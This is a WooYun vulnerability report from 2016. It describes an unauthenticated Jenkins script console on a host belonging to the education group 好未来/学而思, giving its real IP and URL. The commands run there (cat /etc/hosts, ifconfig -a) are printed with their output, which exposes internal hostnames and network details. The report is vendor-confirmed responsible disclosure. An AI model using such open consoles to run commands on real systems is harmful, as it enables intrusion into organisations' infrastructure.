当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0185504

漏洞标题:好未来(前学而思集团)旗下某站点系统未授权访问导致命令执行/涉及多个系统

相关厂商:好未来集团学而思培优

漏洞作者: 路人甲

提交时间:2016-03-16 21:31

修复时间:2016-05-05 10:32

公开时间:2016-05-05 10:32

漏洞类型:命令执行

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-03-16: 细节已通知厂商并且等待厂商处理中
2016-03-21: 厂商已经确认,细节仅向厂商公开
2016-03-31: 细节向核心白帽子及相关领域专家公开
2016-04-10: 细节向普通白帽子公开
2016-04-20: 细节向实习白帽子公开
2016-05-05: 细节向公众公开

简要描述:

rt

详细说明:

mask 区域
*****^^^*****
1.http://**.**.**/_
*****^^权^*****
**********
*****43f26d5121bc508eaafb.png&qu*****
**********
*****^^^*****
2.://**.**.**//111.204.175.67:8000/script</code>_
**********
*****c/ho*****
**********
*****d880aa630776d4382878.png&qu*****
**********
*****ocalhost.localdoma*****
*****domain localhost6 l*****
**********
*****3.69 *****
*****^测^*****
***** yanfa.*****
*****^测^*****
***** xueshe*****
*****^测^*****
***** jiaosh*****
*****^测^*****
*****69 6t.*****
*****拟考^*****
*****69 ksz*****
*****^^评^*****
*****69 xsc*****
*****统测^*****
***** ht010.*****
*****统接^*****
*****69 api*****
*****sbbs.zhi*****
**********
**********
***** zkcms.zk.com comment.z*****
**********
*****kang.*****
*****d3e9d98710504eb72fd3.png&qu*****
**********
*****^系^*****
**********
*****8aaaade6101074cec548.png&qu*****
**********
*****4b64dc4961a5b93eea66.png&qu*****
**********
*****cd523fc9d832b5f59eec.png&qu*****
**********
*****fig*****
*****Ethernet HWaddr *****
*****cast:192.168.3.255*****
*****16:3eff:fe7f:2c*****
*****G MULTICAST MT*****
*****ors:0 dropped:0 *****
*****rors:0 dropped:0*****
*****s:0 txqueu*****
***** MiB) TX bytes:4*****
**********
*****cap:Local*****
*****27.0.0.1 M*****
*****r: ::1/128*****
*****UNNING MTU:*****
*****rs:0 dropped:0 *****
*****rs:0 dropped:0 *****
*****ons:0 txq*****
*****8 KiB) TX byt*****
**********
*****cod*****

漏洞证明:


存在漏洞url
http://111.204.175.67:8000/
jenkins未授权访问

111.png


命令执行url

http://111.204.175.67:8000/script


cat /etc/hosts

111.png


127.0.0.1   localhost localhost.localdomain localhost4 vmNodeWeb
::1 localhost localhost.localdomain localhost6 localhost6.localdomain6
#192.168.3.69 salt
####6T教研测试####
#192.168.3.69 yanfa.zk.org
####6T学生测试####
#192.168.3.69 xuesheng.zk.com
####6T教师测试####
#192.168.3.69 jiaoshi.zk.com
####6T测评测试####
#192.168.3.69 6t.zk.com
####6T学科模拟考测试####
#192.168.3.69 kszx.zk.com
####6T学商测评测试####
#192.168.3.69 xscp.zk.com
####业务系统测试####
#192.168.3.69 ht010.zk.com
####业务系统接口####
#192.168.3.69 api.zk.com
#192.168.3.69 jsbbs.zhikang.org
121.5.20.166 i.zk.com bjkc.zk.com bjhd.zk.com zkcms.zk.com comment.zk.com img.zk.com


有个zhikang.org

111.png


涉及多个系统源码

111.png


111.png


111.png


ifconfig -a

eth0      Link encap:Ethernet  HWaddr 00:16:3E:7F:2C:74  
inet addr:192.168.3.69 Bcast:192.168.3.255 Mask:255.255.255.0
inet6 addr: fe80::216:3eff:fe7f:2c74/64 Scope:Link
UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1
RX packets:435236 errors:0 dropped:0 overruns:0 frame:0
TX packets:3248105 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:45788784 (43.6 MiB) TX bytes:432986880 (412.9 MiB)
lo Link encap:Local Loopback
inet addr:127.0.0.1 Mask:255.0.0.0
inet6 addr: ::1/128 Scope:Host
UP LOOPBACK RUNNING MTU:16436 Metric:1
RX packets:110 errors:0 dropped:0 overruns:0 frame:0
TX packets:110 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:0
RX bytes:7046 (6.8 KiB) TX bytes:7046 (6.8 KiB)


修复方案:

jenkins 未授权访问

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2016-03-21 10:32

厂商回复:

洞主好人一生平安!

最新状态:

暂无